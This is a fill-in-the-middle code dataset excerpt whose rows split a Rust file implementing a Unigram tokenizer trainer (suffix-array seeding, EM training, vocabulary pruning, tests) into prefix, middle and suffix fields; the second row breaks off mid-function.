file_name large_stringlengths 4 140 | prefix large_stringlengths 0 39k | suffix large_stringlengths 0 36.1k | middle large_stringlengths 0 29.4k | fim_type large_stringclasses 4
values |
|---|---|---|---|---|
trainer.rs | use crate::models::unigram::{lattice::Lattice, model::Unigram};
use crate::tokenizer::{AddedToken, Result, Trainer};
use crate::utils::parallelism::*;
use crate::utils::progress::{ProgressBar, ProgressStyle};
use log::debug;
use serde::{Deserialize, Serialize};
use std::cmp::Reverse;
use std::collections::{HashMap, HashSet};
use std::convert::TryInto;
// A token and a score
type SentencePiece = (String, f64);
// A full sentence or word + it's count within the dataset
type Sentence = (String, u32);
fn digamma(mut x: f64) -> f64 |
#[derive(thiserror::Error, Debug)]
pub enum UnigramTrainerError {
#[error("The vocabulary is not large enough to contain all chars")]
VocabularyTooSmall,
}
fn to_log_prob(pieces: &mut [SentencePiece]) {
let sum: f64 = pieces.iter().map(|(_, score)| score).sum();
let logsum = sum.ln();
for (_, score) in pieces.iter_mut() {
*score = score.ln() - logsum;
}
}
/// A `UnigramTrainer` can train a `Unigram` model from `word_counts`.
#[non_exhaustive]
#[derive(Builder, Debug, Clone, Serialize, Deserialize)]
pub struct UnigramTrainer {
#[builder(default = "true")]
pub show_progress: bool,
#[builder(default = "8000")]
pub vocab_size: u32,
#[builder(default = "2")]
pub n_sub_iterations: u32,
#[builder(default = "0.75")]
pub shrinking_factor: f64,
#[builder(default = "vec![]")]
pub special_tokens: Vec<AddedToken>,
#[builder(default = "HashSet::new()")]
pub initial_alphabet: HashSet<char>,
#[builder(default = "None")]
pub unk_token: Option<String>,
#[builder(default = "16")]
pub max_piece_length: usize,
#[builder(default = "1_000_000")]
seed_size: usize,
#[builder(default = "HashMap::new()")]
words: HashMap<String, u32>,
}
impl Default for UnigramTrainer {
fn default() -> Self {
Self::builder().build().unwrap()
}
}
impl UnigramTrainer {
pub fn builder() -> UnigramTrainerBuilder {
UnigramTrainerBuilder::default()
}
/// Setup a progress bar if asked to show progress
fn setup_progress(&self) -> Option<ProgressBar> {
if self.show_progress {
let p = ProgressBar::new(0);
p.set_style(
ProgressStyle::default_bar()
.template("[{elapsed_precise}] {msg:<40!} {wide_bar} {pos:<9!}/{len:>9!}"),
);
Some(p)
} else {
None
}
}
fn is_valid_sentencepiece(&self, char_string: &[char]) -> bool {
// Checks string length
// Space not in the substring, numbers, hiragana and more should be taken
// care of within pre_tokenizers.
// https://github.com/google/sentencepiece/blob/26be9516cd81d5315ee31c48d2438018e0eab879/src/trainer_interface.cc#L203
let n = char_string.len();
if char_string.is_empty() || n > self.max_piece_length {
return false;
}
true
}
fn finalize(&self, model: Unigram, required_chars: HashSet<String>) -> Result<Unigram> {
let mut min_score_penalty = 0.0;
let min_score_penalty_delta = 0.0001;
let mut pieces: Vec<(String, f64)> = vec![];
let mut inserted: HashSet<String> = HashSet::new();
// We don't want to include the <UNK> that was used to train
inserted.insert("<UNK>".into());
let existing_pieces: HashMap<String, f64> = model.iter().cloned().collect();
for c in required_chars {
if let Some(t) = existing_pieces.get(&c) {
inserted.insert(c.clone());
pieces.push((c, *t));
} else {
let score = model.min_score + min_score_penalty;
inserted.insert(c.clone());
pieces.push((c, score));
min_score_penalty += min_score_penalty_delta;
}
}
let (unk_id, need_add_unk) = if let Some(ref unk) = self.unk_token {
let unk_id = self.special_tokens.iter().enumerate().find_map(|(i, t)| {
if t.content == *unk {
Some(i)
} else {
None
}
});
match unk_id {
Some(id) => (Some(id), false),
None => (Some(0), true),
}
} else {
(None, false)
};
let vocab_size_without_special_tokens = if need_add_unk {
self.vocab_size as usize - self.special_tokens.len() - 1
} else {
self.vocab_size as usize - self.special_tokens.len()
};
for (token, score) in model.iter() {
if inserted.contains::<str>(token) {
continue;
}
inserted.insert(token.to_string());
pieces.push((token.to_string(), if score.is_nan() { 0.0 } else { *score }));
if pieces.len() == vocab_size_without_special_tokens {
break;
}
}
pieces.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
// Insert the necessary tokens
let mut special_tokens = self
.special_tokens
.iter()
.map(|t| (t.content.clone(), 0.0))
.collect::<Vec<_>>();
if need_add_unk {
special_tokens.insert(0, (self.unk_token.clone().unwrap(), 0.0));
}
Unigram::from(
special_tokens.into_iter().chain(pieces).collect(),
unk_id,
model.byte_fallback(),
)
}
fn required_chars(&self, word_counts: &[Sentence]) -> HashSet<String> {
word_counts
.iter()
.flat_map(|(s, _count)| s.chars())
.chain(self.initial_alphabet.iter().copied())
.map(|c| c.to_string())
.collect()
}
fn make_seed_sentence_pieces(
&self,
sentences: &[Sentence],
_progress: &Option<ProgressBar>,
) -> Vec<SentencePiece> {
// Put all sentences in a string, separated by \0
let total: usize = sentences
.iter()
.map(|(s, _)| s.chars().count())
.sum::<usize>()
+ sentences.len();
let mut flat_string = String::with_capacity(total);
let mut all_chars: HashMap<char, u32> = HashMap::new();
let c_sentence_boundary = '\0';
let k_sentence_boundary = '\0'.to_string();
for (string, n) in sentences {
if string.is_empty() {
continue;
}
flat_string.push_str(string);
// XXX
// Comment suggests we add sentence boundary, but it seems to be missing from actual
// code in spm.
flat_string.push_str(&k_sentence_boundary);
for c in string.chars() {
if c != c_sentence_boundary {
*all_chars.entry(c).or_insert(0) += n;
}
}
}
flat_string.shrink_to_fit();
#[cfg(feature = "esaxx_fast")]
let suffix = esaxx_rs::suffix(&flat_string).unwrap();
#[cfg(not(feature = "esaxx_fast"))]
let suffix = esaxx_rs::suffix_rs(&flat_string).unwrap();
// Basic chars need to be in sentence pieces.
let mut seed_sentencepieces: Vec<SentencePiece> = vec![];
let mut sall_chars: Vec<_> = all_chars.into_iter().map(|(a, b)| (b, a)).collect();
// Reversed order
sall_chars.sort_by_key(|&a| Reverse(a));
let mut substr_index: Vec<_> = suffix
.iter()
.filter_map(|(string, freq)| {
if string.len() <= 1 {
return None;
}
if string.contains(&c_sentence_boundary) {
return None;
}
if !self.is_valid_sentencepiece(string) {
return None;
}
let score = freq * string.len() as u32;
// if let Some(p) = &progress {
// p.inc(1);
// }
Some((score, string))
})
.collect();
// Fill seed_sentencepieces
for (count, character) in sall_chars {
seed_sentencepieces.push((character.to_string(), count.into()));
}
// sort by decreasing score
substr_index.sort_by_key(|&a| Reverse(a));
for (score, char_string) in substr_index {
// Just in case
assert!(self.is_valid_sentencepiece(char_string));
let string: String = char_string.iter().collect();
seed_sentencepieces.push((string, score.into()));
if seed_sentencepieces.len() >= self.seed_size {
break;
}
}
to_log_prob(&mut seed_sentencepieces);
seed_sentencepieces
}
fn prune_sentence_pieces(
&self,
model: &Unigram,
pieces: &[SentencePiece],
sentences: &[Sentence],
) -> Vec<SentencePiece> {
let mut always_keep = vec![true; pieces.len()];
let mut alternatives: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
let bos_id = pieces.len() + 1;
let eos_id = pieces.len() + 2;
// First, segments the current sentencepieces to know
// how each sentencepiece is resegmented if this sentencepiece is removed
// from the vocabulary.
// To do so, we take the second best segmentation of sentencepiece[i].
// alternatives[i] stores the sequence of second best sentencepieces.
for (id, (token, _score)) in pieces.iter().enumerate() {
// Always keep unk.
if id == 0 {
always_keep[id] = false;
continue;
}
let mut lattice = Lattice::from(token, bos_id, eos_id);
model.populate_nodes(&mut lattice);
let nbests = lattice.nbest(2);
if nbests.len() == 1 {
always_keep[id] = true;
} else if nbests[0].len() >= 2 {
always_keep[id] = false;
} else if nbests[0].len() == 1 {
always_keep[id] = true;
for node in &nbests[1] {
let alt_id = node.borrow().id;
alternatives[id].push(alt_id);
}
}
}
// Second, segments all sentences to compute likelihood
// with a unigram language model. inverted[i] stores
// the set of sentence index where the sentencepieces[i] appears.
let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
let indexed_sentences: Vec<(usize, &Sentence)> = sentences.iter().enumerate().collect();
let collected: (f64, Vec<f64>, Vec<Vec<usize>>) = indexed_sentences
.maybe_par_chunks(chunk_size)
.map(|enumerated_sentence_count_chunk| {
let mut vsum = 0.0;
let mut freq: Vec<f64> = vec![0.0; pieces.len()];
let mut inverted: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
for (i, (sentence, count)) in enumerated_sentence_count_chunk {
let mut lattice = Lattice::from(sentence, bos_id, eos_id);
model.populate_nodes(&mut lattice);
vsum += *count as f64;
for node_ref in lattice.viterbi() {
let id = node_ref.borrow().id;
freq[id] += *count as f64;
inverted[id].push(*i);
}
}
(vsum, freq, inverted)
})
.reduce(
|| (0.0, vec![0.0; pieces.len()], vec![Vec::new(); pieces.len()]),
|(vsum, freq, inverted), (lvsum, lfreq, linverted)| {
(
vsum + lvsum,
freq.iter()
.zip(lfreq)
.map(|(global_el, local_el)| global_el + local_el)
.collect(),
inverted
.iter()
.zip(linverted)
.map(|(global_el, local_el)| [&global_el[..], &local_el[..]].concat())
.collect(),
)
},
);
let (vsum, freq, inverted) = collected;
let sum: f64 = freq.iter().sum();
let logsum = sum.ln();
let mut candidates: Vec<(usize, f64)> = vec![];
let mut new_pieces: Vec<SentencePiece> = Vec::with_capacity(self.vocab_size as usize);
new_pieces.push(pieces[0].clone());
// Finally, computes how likely the LM likelihood is reduced if
// the sentencepiece[i] is removed from the vocabulary.
// Since the exact computation of loss is difficult, we compute the
// loss approximately by assuming that all sentencepiece[i] in the sentences
// are replaced with alternatives[i] when sentencepiece[i] is removed.
for (id, (token, score)) in pieces.iter().enumerate() {
if id == 0 {
continue;
}
if freq[id] == 0.0 && !always_keep[id] {
// not found in Viterbi path. Can remove this entry safely.
continue;
} else if alternatives[id].is_empty() {
// no alternatives. Keeps this entry.
new_pieces.push((token.to_string(), *score));
} else {
let mut f = 0.0; // the frequency of pieces[i];
for n in &inverted[id] {
let score = sentences[*n].1 as f64;
f += score;
}
// TODO: Temporary hack to avoid Nans.
if f == 0.0 || f.is_nan() {
// new_pieces.push((token.to_string(), *score));
continue;
}
f /= vsum; // normalizes by all sentence frequency.
let logprob_sp = freq[id].ln() - logsum;
// After removing the sentencepiece[i], its frequency freq[i] is
// re-assigned to alternatives.
// new_sum = current_sum - freq[i] + freq[i] * alternatives.size()
// = current_sum + freq[i] (alternatives - 1)
let logsum_alt = (sum + freq[id] * (alternatives.len() - 1) as f64).ln();
// The frequencies of altenatives are increased by freq[i].
let mut logprob_alt = 0.0;
for n in &alternatives[id] {
logprob_alt += (freq[*n] + freq[id]).ln() - logsum_alt;
}
// loss: the diff of likelihood after removing the sentencepieces[i].
let loss = f * (logprob_sp - logprob_alt);
if loss.is_nan() {
panic!("");
}
candidates.push((id, loss));
}
}
let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
let pruned_size: usize = ((pieces.len() as f64) * self.shrinking_factor) as usize;
let pruned_size = desired_vocab_size.max(pruned_size);
candidates.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
for (id, _score) in candidates {
if new_pieces.len() == pruned_size {
break;
}
new_pieces.push(pieces[id].clone());
}
new_pieces.to_vec()
}
/// Update the progress bar with the new provided length and message
fn update_progress(&self, p: &Option<ProgressBar>, len: usize, message: &str) {
if let Some(p) = p {
p.set_message(message);
p.set_length(len as u64);
p.set_draw_delta(len as u64 / 100);
p.reset();
}
}
/// Set the progress bar in the finish state
fn finalize_progress(&self, p: &Option<ProgressBar>, final_len: usize) {
if let Some(p) = p {
p.set_length(final_len as u64);
p.finish();
println!();
}
}
fn run_e_step(&self, model: &Unigram, sentences: &[Sentence]) -> (f64, u32, Vec<f64>) {
let all_sentence_freq: u32 = sentences.iter().map(|(_a, b)| *b).sum();
let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
let collected: (f64, u32, Vec<f64>) = sentences
.maybe_par_chunks(chunk_size)
.map(|sentences_chunk| {
let mut expected: Vec<f64> = vec![0.0; model.len()];
let mut objs: f64 = 0.0;
let mut ntokens: u32 = 0;
for (string, freq) in sentences_chunk {
let mut lattice = Lattice::from(string, model.bos_id, model.eos_id);
model.populate_nodes(&mut lattice);
let z: f64 = lattice.populate_marginal(*freq as f64, &mut expected);
if z.is_nan() {
panic!("likelihood is NAN. Input sentence may be too long.");
}
ntokens += lattice.viterbi().len() as u32;
objs -= z / (all_sentence_freq as f64);
}
(objs, ntokens, expected)
})
.reduce(
|| (0.0, 0, vec![0.0; model.len()]),
|(objs, ntokens, expected), (lobjs, lntokens, lexpected)| {
(
objs + lobjs,
ntokens + lntokens,
expected
.iter()
.zip(lexpected)
.map(|(global_el, local_el)| global_el + local_el)
.collect(),
)
},
);
collected
}
fn run_m_step(&self, pieces: &[SentencePiece], expected: &[f64]) -> Vec<SentencePiece> {
if pieces.len() != expected.len() {
panic!(
"Those two iterators are supposed to be the same length ({} vs {})",
pieces.len(),
expected.len()
);
}
let mut new_pieces: Vec<SentencePiece> =
Vec::with_capacity(self.vocab_size.try_into().unwrap());
let mut sum = 0.0;
let expected_frequency_threshold = 0.5;
for (i, (freq, (piece, _score))) in expected.iter().zip(pieces).enumerate() {
// Always keep unk.
if i == 0 {
new_pieces.push((piece.clone(), f64::NAN));
continue;
}
if *freq < expected_frequency_threshold {
continue;
}
new_pieces.push((piece.clone(), *freq));
sum += freq;
}
// // Here we do not use the original EM, but use the
// // Bayesianified/DPified EM algorithm.
// // https://cs.stanford.edu/~pliang/papers/tutorial-acl2007-talk.pdf
// // This modification will act as a sparse prior.
let logsum = digamma(sum);
let new_pieces: Vec<_> = new_pieces
.into_iter()
.map(|(s, c)| (s, digamma(c) - logsum))
.collect();
new_pieces
}
pub fn do_train(
&self,
sentences: Vec<Sentence>,
model: &mut Unigram,
) -> Result<Vec<AddedToken>> {
let progress = self.setup_progress();
//
// 1. Compute frequent substrings
// TODO Should be able to upgrade to u64 when needed
self.update_progress(&progress, sentences.len(), "Suffix array seeds");
let mut pieces: Vec<SentencePiece> =
Vec::with_capacity(self.vocab_size.try_into().unwrap());
// We use a UNK token when training, whatever the `self.unk_token`
pieces.push(("<UNK>".into(), f64::NAN));
pieces.extend(self.make_seed_sentence_pieces(&sentences, &progress));
self.finalize_progress(&progress, sentences.len());
// Useful to check compatibility with spm.
debug!(
"Using {} pieces on {} sentences for EM training",
pieces.len(),
sentences.len()
);
let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
// 2. Run E-M Loops to fine grain the pieces.
// We will shrink the vocab by shrinking_factor every loop on average
// Some other pieces are dropped if logprob is too small
// V = N * (f)**k
// k = log(V / N) / log(f)
let expected_loops = (((desired_vocab_size as f64).ln() - (pieces.len() as f64).ln())
/ self.shrinking_factor.ln()) as usize
+ 1;
let expected_updates = expected_loops * self.n_sub_iterations as usize;
self.update_progress(&progress, expected_updates, "EM training");
let required_chars = self.required_chars(&sentences);
if required_chars.len() as u32 > self.vocab_size {
return Err(Box::new(UnigramTrainerError::VocabularyTooSmall));
}
let mut new_model = Unigram::from(pieces.clone(), Some(0), false)?;
loop {
// Sub-EM iteration.
for _iter in 0..self.n_sub_iterations {
// Executes E step
let (_objective, _num_tokens, expected) = self.run_e_step(&new_model, &sentences);
// Executes M step.
pieces = self.run_m_step(&pieces, &expected);
new_model = Unigram::from(pieces.clone(), Some(0), false)?;
// Useful comment for checking compatibility with spm
debug!(
"Em iter={} size={} obj={} num_tokens={} num_tokens/piece={}",
_iter,
new_model.len(),
_objective,
_num_tokens,
_num_tokens as f64 / model.len() as f64
);
if let Some(p) = &progress {
p.inc(1);
}
} // end of Sub EM iteration
// Stops the iteration when the size of sentences reaches to the
// desired symbol size.
if pieces.len() <= desired_vocab_size {
break;
}
// Prunes pieces.
pieces = self.prune_sentence_pieces(&new_model, &pieces, &sentences);
new_model = Unigram::from(pieces.clone(), Some(0), false)?;
}
self.finalize_progress(&progress, expected_updates);
// Finally, adjusts the size of sentencepices to be |vocab_size|.
*model = self.finalize(new_model, required_chars)?;
Ok(self.special_tokens.clone())
}
}
impl Trainer for UnigramTrainer {
type Model = Unigram;
/// Train a Unigram model
fn train(&self, model: &mut Unigram) -> Result<Vec<AddedToken>> {
let sentences: Vec<_> = self.words.iter().map(|(s, i)| (s.to_owned(), *i)).collect();
self.do_train(sentences, model)
}
/// Whether we should show progress
fn should_show_progress(&self) -> bool {
self.show_progress
}
fn feed<I, S, F>(&mut self, iterator: I, process: F) -> Result<()>
where
I: Iterator<Item = S> + Send,
S: AsRef<str> + Send,
F: Fn(&str) -> Result<Vec<String>> + Sync,
{
let words: Result<HashMap<String, u32>> = iterator
.maybe_par_bridge()
.map(|sequence| {
let words = process(sequence.as_ref())?;
let mut map = HashMap::new();
for word in words {
map.entry(word).and_modify(|c| *c += 1).or_insert(1);
}
Ok(map)
})
.reduce(
|| Ok(HashMap::new()),
|acc, ws| {
let mut acc = acc?;
for (k, v) in ws? {
acc.entry(k).and_modify(|c| *c += v).or_insert(v);
}
Ok(acc)
},
);
self.words = words?;
Ok(())
}
}
#[cfg(test)]
mod tests {
use super::*;
use assert_approx_eq::assert_approx_eq;
use std::iter::FromIterator;
#[test]
fn test_unigram_chars() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.build()
.unwrap();
let sentences = vec![
("This is a".to_string(), 1),
("こんにちは友達".to_string(), 1),
];
let required_chars = trainer.required_chars(&sentences);
assert_eq!(required_chars.len(), 13);
let progress = None;
let table = trainer.make_seed_sentence_pieces(&sentences, &progress);
let target_strings = vec![
"s", "i", " ", "達", "友", "ん", "は", "に", "ち", "こ", "h", "a", "T", "is ", "s ",
];
let strings: Vec<_> = table.iter().map(|(string, _)| string).collect();
assert_eq!(strings, target_strings);
let scores = table.iter().map(|(_, score)| score);
let target_scores = vec![
-2.5649493574615367, // 2.0
-2.5649493574615367, // 2.0
-2.5649493574615367, // 2.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-1.4663370687934272, // 6.0
-1.8718021769015916, // 4.0
];
for (score, target_score) in scores.zip(target_scores) {
assert_approx_eq!(*score, target_score, 0.01);
}
}
#[test]
fn test_initial_alphabet() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.initial_alphabet(HashSet::from_iter(vec!['a', 'b', 'c', 'd', 'e', 'f']))
.build()
.unwrap();
let sentences = vec![("こんにちは友達".to_string(), 1)];
let required_chars = trainer.required_chars(&sentences);
assert_eq!(
required_chars,
vec!["こ", "ん", "に", "ち", "は", "友", "達", "a", "b", "c", "d", "e", "f"]
.into_iter()
.map(|s| s.to_owned())
.collect::<HashSet<_>>()
);
}
#[test]
fn test_unk_token() {
// 1. Should add `unk_token` as first special token
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
])
.unk_token(Some("[UNK]".into()))
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
// 2. Let it where it is
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
AddedToken::from("[UNK]", true),
])
.unk_token(Some("[UNK]".into()))
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
// 3. Don't put it there if not needed
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next().unwrap().0, "e".to_string());
}
#[test]
fn test_special_tokens() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
])
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
}
#[test]
fn test_to_log_prob() {
let mut a = vec![("".to_string(), 1.0), ("".to_string(), 2.0)];
to_log_prob(&mut a);
let scores = a.iter().map(|(_, score)| *score).collect::<Vec<_>>();
// ln(1) - ln(3)
assert_approx_eq!(scores[0], -1.098, 0.01);
// ln(2) - ln(3)
assert_approx_eq!(scores[1], -0.405, 0.01);
}
}
| {
let mut result = 0.0;
while x < 7.0 {
result -= 1.0 / x;
x += 1.0;
}
x -= 1.0 / 2.0;
let xx = 1.0 / x;
let xx2 = xx * xx;
let xx4 = xx2 * xx2;
result += x.ln() + (1.0 / 24.0) * xx2 - 7.0 / 960.0 * xx4 + (31.0 / 8064.0) * xx4 * xx2
- (127.0 / 30720.0) * xx4 * xx4;
result
} | identifier_body |
trainer.rs | use crate::models::unigram::{lattice::Lattice, model::Unigram};
use crate::tokenizer::{AddedToken, Result, Trainer};
use crate::utils::parallelism::*;
use crate::utils::progress::{ProgressBar, ProgressStyle};
use log::debug;
use serde::{Deserialize, Serialize};
use std::cmp::Reverse;
use std::collections::{HashMap, HashSet};
use std::convert::TryInto;
// A token and a score
type SentencePiece = (String, f64);
// A full sentence or word + it's count within the dataset
type Sentence = (String, u32);
fn digamma(mut x: f64) -> f64 {
let mut result = 0.0;
while x < 7.0 {
result -= 1.0 / x;
x += 1.0;
}
x -= 1.0 / 2.0;
let xx = 1.0 / x;
let xx2 = xx * xx;
let xx4 = xx2 * xx2;
result += x.ln() + (1.0 / 24.0) * xx2 - 7.0 / 960.0 * xx4 + (31.0 / 8064.0) * xx4 * xx2
- (127.0 / 30720.0) * xx4 * xx4;
result
}
#[derive(thiserror::Error, Debug)]
pub enum UnigramTrainerError {
#[error("The vocabulary is not large enough to contain all chars")]
VocabularyTooSmall,
}
fn to_log_prob(pieces: &mut [SentencePiece]) {
let sum: f64 = pieces.iter().map(|(_, score)| score).sum();
let logsum = sum.ln();
for (_, score) in pieces.iter_mut() {
*score = score.ln() - logsum;
}
}
/// A `UnigramTrainer` can train a `Unigram` model from `word_counts`.
#[non_exhaustive]
#[derive(Builder, Debug, Clone, Serialize, Deserialize)]
pub struct UnigramTrainer {
#[builder(default = "true")]
pub show_progress: bool,
#[builder(default = "8000")]
pub vocab_size: u32,
#[builder(default = "2")]
pub n_sub_iterations: u32,
#[builder(default = "0.75")]
pub shrinking_factor: f64,
#[builder(default = "vec![]")]
pub special_tokens: Vec<AddedToken>,
#[builder(default = "HashSet::new()")]
pub initial_alphabet: HashSet<char>,
#[builder(default = "None")]
pub unk_token: Option<String>,
#[builder(default = "16")]
pub max_piece_length: usize,
#[builder(default = "1_000_000")]
seed_size: usize,
#[builder(default = "HashMap::new()")]
words: HashMap<String, u32>,
}
impl Default for UnigramTrainer {
fn default() -> Self {
Self::builder().build().unwrap()
}
}
impl UnigramTrainer {
pub fn builder() -> UnigramTrainerBuilder {
UnigramTrainerBuilder::default()
}
/// Setup a progress bar if asked to show progress
fn setup_progress(&self) -> Option<ProgressBar> {
if self.show_progress {
let p = ProgressBar::new(0);
p.set_style(
ProgressStyle::default_bar()
.template("[{elapsed_precise}] {msg:<40!} {wide_bar} {pos:<9!}/{len:>9!}"),
);
Some(p)
} else {
None
}
}
fn is_valid_sentencepiece(&self, char_string: &[char]) -> bool {
// Checks string length
// Space not in the substring, numbers, hiragana and more should be taken
// care of within pre_tokenizers.
// https://github.com/google/sentencepiece/blob/26be9516cd81d5315ee31c48d2438018e0eab879/src/trainer_interface.cc#L203
let n = char_string.len();
if char_string.is_empty() || n > self.max_piece_length {
return false;
}
true
}
fn finalize(&self, model: Unigram, required_chars: HashSet<String>) -> Result<Unigram> {
let mut min_score_penalty = 0.0;
let min_score_penalty_delta = 0.0001;
let mut pieces: Vec<(String, f64)> = vec![];
let mut inserted: HashSet<String> = HashSet::new();
// We don't want to include the <UNK> that was used to train
inserted.insert("<UNK>".into());
let existing_pieces: HashMap<String, f64> = model.iter().cloned().collect();
for c in required_chars {
if let Some(t) = existing_pieces.get(&c) {
inserted.insert(c.clone());
pieces.push((c, *t));
} else {
let score = model.min_score + min_score_penalty;
inserted.insert(c.clone());
pieces.push((c, score));
min_score_penalty += min_score_penalty_delta;
}
}
let (unk_id, need_add_unk) = if let Some(ref unk) = self.unk_token {
let unk_id = self.special_tokens.iter().enumerate().find_map(|(i, t)| {
if t.content == *unk {
Some(i)
} else {
None
}
});
match unk_id {
Some(id) => (Some(id), false),
None => (Some(0), true),
}
} else {
(None, false)
};
let vocab_size_without_special_tokens = if need_add_unk {
self.vocab_size as usize - self.special_tokens.len() - 1
} else {
self.vocab_size as usize - self.special_tokens.len()
};
for (token, score) in model.iter() {
if inserted.contains::<str>(token) {
continue;
}
inserted.insert(token.to_string());
pieces.push((token.to_string(), if score.is_nan() { 0.0 } else { *score }));
if pieces.len() == vocab_size_without_special_tokens {
break;
}
}
pieces.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
// Insert the necessary tokens
let mut special_tokens = self
.special_tokens
.iter()
.map(|t| (t.content.clone(), 0.0))
.collect::<Vec<_>>();
if need_add_unk {
special_tokens.insert(0, (self.unk_token.clone().unwrap(), 0.0));
}
Unigram::from(
special_tokens.into_iter().chain(pieces).collect(),
unk_id,
model.byte_fallback(),
)
}
fn | (&self, word_counts: &[Sentence]) -> HashSet<String> {
word_counts
.iter()
.flat_map(|(s, _count)| s.chars())
.chain(self.initial_alphabet.iter().copied())
.map(|c| c.to_string())
.collect()
}
fn make_seed_sentence_pieces(
&self,
sentences: &[Sentence],
_progress: &Option<ProgressBar>,
) -> Vec<SentencePiece> {
// Put all sentences in a string, separated by \0
let total: usize = sentences
.iter()
.map(|(s, _)| s.chars().count())
.sum::<usize>()
+ sentences.len();
let mut flat_string = String::with_capacity(total);
let mut all_chars: HashMap<char, u32> = HashMap::new();
let c_sentence_boundary = '\0';
let k_sentence_boundary = '\0'.to_string();
for (string, n) in sentences {
if string.is_empty() {
continue;
}
flat_string.push_str(string);
// XXX
// Comment suggests we add sentence boundary, but it seems to be missing from actual
// code in spm.
flat_string.push_str(&k_sentence_boundary);
for c in string.chars() {
if c != c_sentence_boundary {
*all_chars.entry(c).or_insert(0) += n;
}
}
}
flat_string.shrink_to_fit();
#[cfg(feature = "esaxx_fast")]
let suffix = esaxx_rs::suffix(&flat_string).unwrap();
#[cfg(not(feature = "esaxx_fast"))]
let suffix = esaxx_rs::suffix_rs(&flat_string).unwrap();
// Basic chars need to be in sentence pieces.
let mut seed_sentencepieces: Vec<SentencePiece> = vec![];
let mut sall_chars: Vec<_> = all_chars.into_iter().map(|(a, b)| (b, a)).collect();
// Reversed order
sall_chars.sort_by_key(|&a| Reverse(a));
let mut substr_index: Vec<_> = suffix
.iter()
.filter_map(|(string, freq)| {
if string.len() <= 1 {
return None;
}
if string.contains(&c_sentence_boundary) {
return None;
}
if !self.is_valid_sentencepiece(string) {
return None;
}
let score = freq * string.len() as u32;
// if let Some(p) = &progress {
// p.inc(1);
// }
Some((score, string))
})
.collect();
// Fill seed_sentencepieces
for (count, character) in sall_chars {
seed_sentencepieces.push((character.to_string(), count.into()));
}
// sort by decreasing score
substr_index.sort_by_key(|&a| Reverse(a));
for (score, char_string) in substr_index {
// Just in case
assert!(self.is_valid_sentencepiece(char_string));
let string: String = char_string.iter().collect();
seed_sentencepieces.push((string, score.into()));
if seed_sentencepieces.len() >= self.seed_size {
break;
}
}
to_log_prob(&mut seed_sentencepieces);
seed_sentencepieces
}
fn prune_sentence_pieces(
&self,
model: &Unigram,
pieces: &[SentencePiece],
sentences: &[Sentence],
) -> Vec<SentencePiece> {
let mut always_keep = vec![true; pieces.len()];
let mut alternatives: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
let bos_id = pieces.len() + 1;
let eos_id = pieces.len() + 2;
// First, segments the current sentencepieces to know
// how each sentencepiece is resegmented if this sentencepiece is removed
// from the vocabulary.
// To do so, we take the second best segmentation of sentencepiece[i].
// alternatives[i] stores the sequence of second best sentencepieces.
for (id, (token, _score)) in pieces.iter().enumerate() {
// Always keep unk.
if id == 0 {
always_keep[id] = false;
continue;
}
let mut lattice = Lattice::from(token, bos_id, eos_id);
model.populate_nodes(&mut lattice);
let nbests = lattice.nbest(2);
if nbests.len() == 1 {
always_keep[id] = true;
} else if nbests[0].len() >= 2 {
always_keep[id] = false;
} else if nbests[0].len() == 1 {
always_keep[id] = true;
for node in &nbests[1] {
let alt_id = node.borrow().id;
alternatives[id].push(alt_id);
}
}
}
// Second, segments all sentences to compute likelihood
// with a unigram language model. inverted[i] stores
// the set of sentence index where the sentencepieces[i] appears.
let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
let indexed_sentences: Vec<(usize, &Sentence)> = sentences.iter().enumerate().collect();
let collected: (f64, Vec<f64>, Vec<Vec<usize>>) = indexed_sentences
.maybe_par_chunks(chunk_size)
.map(|enumerated_sentence_count_chunk| {
let mut vsum = 0.0;
let mut freq: Vec<f64> = vec![0.0; pieces.len()];
